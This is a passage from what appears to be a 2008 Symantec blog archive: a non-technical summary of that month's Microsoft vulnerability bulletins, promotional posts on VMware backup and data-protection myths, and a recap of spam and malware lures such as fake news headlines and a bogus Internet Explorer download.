A client-side remote code-execution vulnerability affects Media Player when handling streamed audio-only files from a server-side playlist (SSPL). An attacker must trick a victim into opening a malicious audio file from a Windows Media Server to exploit this issue. A successful attack will result in the execution of attacker-supplied code in the context of the currently logged-in user.
Affects: Windows Media Player 11
3. MS08-055 Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (955047)
CVE-2008-3007 (BID 31067) Microsoft Office OneNote URL Handler Remote Code Execution Vulnerability (MS Rating: Critical / Symantec Urgency Rating 7.1/10)
A remote code execution vulnerability affects Office when processing the OneNote protocol handler ('onenote://'). An attacker can exploit this issue by tricking a victim into following a malicious URL. A successful attack will result in the execution of arbitrary code in the context of the currently logged-in user.
Affects: Microsoft Office XP SP3, Microsoft Office 2003 SP2 and SP3, 2007 Microsoft Office System, 2007 Microsoft Office System SP1, Microsoft Office OneNote 2007 and Microsoft Office OneNote 2007 SP1
4. MS08-053 Vulnerability in Windows Media Encoder 9 Could Allow Remote Code Execution (954156)
CVE-2008-3008 (BID 31065) Microsoft Windows Media Encoder 9 'wmex.dll' ActiveX Control Remote Buffer Overflow Vulnerability (MS Rating: Critical / Symantec Urgency Rating 7.1/10)
A client-side remote-code execution vulnerability affects the WMEX.DLL ActiveX control installed by Windows Media Encoder 9. An attacker must trick a victim into viewing a Web page containing malicious content to exploit this issue. A successful attack will result in the execution of arbitrary code in the context of the currently logged-in user.
Affects: Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows XP Professional x64 Edition, Windows XP Professional x64 Edition SP2, Windows Server 2003 SP1 and SP2, Windows Server 2003 x64 Edition, Windows Server 2003 x64 Edition SP2, Windows Vista, Windows Vista SP1, Windows Vista x64 Edition, Windows Vista x64 Edition SP1, and Windows Server 2008 for 32-bit Systems**, and x64-based Systems**
- More information on this and the other vulnerabilities being addressed this month is available at Symantec's free SecurityFocus portal and to our customers through the DeepSight Threat Management System.
Message Edited by Robert Keith on 09-09-2008 11:05 AM
Mealtime in South America Makes Me Think About Backing Up VMware
The process reminds me a bit of what backup administrators face when they are trying to figure out how to back up their VMware environments. There are many ways to do it and often they don't know which is best. The easy and obvious way is to run a backup client from inside each virtual machine. In some cases that works fine, but in other cases, all the backups running simultaneously overloads the physical server (the challenges of sharing I/O and CPU across a whole lot of processes). Another way is to run a backup client from inside the service console. And yet another way is to leverage VMware's VCB technology, which is a high-performance snapshotting solution that moves the VM image to a separate (proxy) server from which the actual backup is executed.
So, which is best - the red salsa or the green (verde)? Well, it depends. Because the answer is not the same for everyone, and sometimes, trying to decipher the options is like reading a menu written in a language you don't understand. You might be looking for the easy, watered-down "mild" solution, when what your environment really needs is the latest and greatest deduplication technology (picante hot!). Consider asking your waiter - err, data protection vendor - who can explain the options to you and who speaks your language. Check out more information here to determine which approach is most suitable for your unique needs.
Top Data Protection Myths - Myth 2
Myth 2: Disk-Based Technologies Are Too Complicated
Late last week, we kicked off a blog post series looking at the common myths that exist around data protection technologies. I tried to convince users that scalability can be realized with the right data protection strategy, thanks to the innovative technologies that exist today.
Technological advancement with hard disks has been a tremendous driver for data protection technologies, yet some users think disk-based technologies are too complicated. We don't advocate that users replace tape entirely; in fact, there is a place for tape backups in most IT environments. However, don't shortchange yourself by overlooking today's new disk technologies. Some of them might be intimidating, but in actuality they will help administrators reduce storage capacity and IT overhead.
The most compelling driver for disk technologies might be the ability to meet recovery time objectives (RTOs) and recovery point objectives (RPOs) more easily. Even the smallest organizations must deal with the fact that the tolerance for data loss is dramatically lower than ever before.
Disk technologies provide a great platform for software manufacturers to do things that are just not possible with serial-storage media such as tape. A prime example is the ability to use a single backup set of data coupled with granular recovery technology to address today's complex recovery scenarios. Users can gain the ability to recover everything from a single document to an entire system with just one backup. Disk also powers entirely new possibilities for complete system recovery. Bare-metal recovery to dissimilar hardware environments-as well as to virtual environments-is a must-have in every IT organization's toolbox, even those without deep pockets.
Data deduplication and continuous data protection (CDP) take disk to the next level for many users. Data deduplication, which can be driven with software or hardware, looks for redundant instances of backup data at a sub-file, or block level, across all backup data.
Continuous data protection (CDP), also called continuous backup, refers to the automatic backup of data every time data on a volume, file system, or database system changes. It allows administrators (and in some cases users) to restore data to any point in time, so with today's RTOs and RPOs it makes CDP a very compelling solution. Writing a continuous stream of data demands that disk-based solutions are implemented.
A growing number of disk-based backup and recovery tools also provide online backup and restore capabilities via storage-as-a-service (SaaS) technologies. For small businesses or remote offices with limited or no IT staff on site, this service saves time and resources and eliminates the headaches associated with tape-based backup by electronically sending backups to a secure offsite location where they are safe from hardware failure, malicious code and natural disasters. "Last-mile" issues of Internet access bandwidth still plague customers of all sizes. Coupling SaaS with existing in-house data protection tools eliminates the "all-or-nothing" proposition of traditional SaaS offerings. This hybrid approach allows customers to take advantage of SaaS for protecting their most critical data from site disasters but continues to leverage the power of in-house solutions for fast recovery in all but the most disastrous situations.
The bottom line is that disk technologies can help IT managers sleep better at night. As the tolerance for data loss dramatically decreases, the role of disk is becoming more critical in any organizations data protection strategy. More data protection myths will be busted throughout the week-stay tuned.
Jason Fisher
Director of Product Management, Symantec Backup Exec
Top Data Protection Myths
Myth 1 - Data Protection Solutions Do Not Scale with my Business
Plenty has been said about the challenges that exist today for IT and data center managers. I will spare you the typical descriptions about the increase in mission-critical data, plain old exploding volumes of data, and data distributed across a dispersed workforce. We're all well aware of these issues.
Let's talk about the good news. There is a tremendous about of innovation in data protection technologies today. Take a second to think about everything you've heard about granular recovery, data deduplication, cloud-based storage, SaaS, innovative data protection technology for virtual environments, and continuous data protection. These are all technologies that can be applied to solve specific challenges in the context of a larger data protection platform, and IT folks are beginning to catch on to most of them. However, this innovation has come with quite a few myths that I'd like to dispel with a blog series about data protection technologies. I'll take a stab at providing some insight into how organizations can use some of the latest and greatest technologies in data protection - and talk about the most common misperceptions.
For Myth Number One, I'd like to focus on scalability because of the aforementioned issue of increasing data volumes. Environments are becoming more complex and expanding at a mind-boggling pace. So, scalability is obviously an issue for most users. Often, organizations-particularly those whom are resource-constrained or have little or no in-house data protection expertise-tend to think they need to "rip and replace" data protection software as their business grows. In reality, there has been enough innovation to give users a more dynamic and scalable approach.
So what is needed to find the right amount of scalability? Backup and recovery tools must include the capability to synchronize and manage data backups on multiple media servers and provide a central point of administration and control for job processing and load balancing. Whether an organization has just three media servers or more than 100, a central administration capability is essential to manage data protection operations across the entire backup environment. This will give users what they need to manage their IT infrastructure as it grows.
Centralized administration capabilities offer additional benefits to remote offices and departments, and give you the ability to replicate data from remote office servers to a central location at the corporate office, where data can be reliably backed up and stored.
An often overlooked, but ever-present pain point is the management of the data protection infrastructure itself-lifecycle management of agents and media servers, especially upgrading versions of product that are several major revisions old; centralization of license information, detection of unprotected resources, and real-time monitoring of data protection storage resources. These are some examples of where data protection solutions are broadening their offerings to solve some long-standing and very labor-intensive problems.
Keep checking back here more myths around data protection. We will tackle one each day over the next week to address everything from upgrading to disk-based backup, granular recovery technology to backing up virtual machines.
Jason Fisher
Director of Product Management, Symantec Backup Exec
Month of the Virus
- Sensationalized "fake" news headlines
- Use of seemingly real news headlines
- Purported download for the latest version of Internet Explorer
- Malware + spam + phishing = The triple security threat for financial institutions
- Airline e-ticket connects malicious code and spam
Sensational (and in many cases ridiculous) fake news headlines were all the rage in August. With subject lines declaring everything from possible presidential running mates "McCain Chooses Paris Hilton to be Running Mate" to "Beijing Olympics Cancelled," these emails contained a link to malicious code and were not-and I hate to be the one to break the bad news-legitimate news stories. This malware is designed to infect other computers with viruses and Trojans. Among the subject lines based upon real events that were made to appear like legitimate news articles were the ones abusing of the Russia-Georgia conflict, which we previously blogged about.
One high profile attack observed in August invited users to download a free version of Microsoft Internet Explorer 7. The message contained a dotted quad URL with an .exe download that was detected as Trojan.bluesod. Dotted quad spam occurs when the dotted quad address of the spam URL link is used in the spam message body rather than the domain name of the spam URL. This is a prevalent technique in spam and now, virus.
A triple threat to security was observed in one single spam attack in August. A phishing message against a financial institution was claiming to introduce new security measures to protect customers against fraud and identify theft. This spam message claimed that the features were mandatory and being introduced immediately via downloadable (hello, virus!) attachment. Typically when phishing, spammers will ask recipients to update account details using a bogus URL link, so this move to a downloadable attachment is a new one. Will it be a lasting technique?
You can read all about the above issues in addition to other malicious code and spam duos observed recently in the September State of Spam Report. Message Edited by SR Blog Moderator on 09-04-2008 07:45 AM
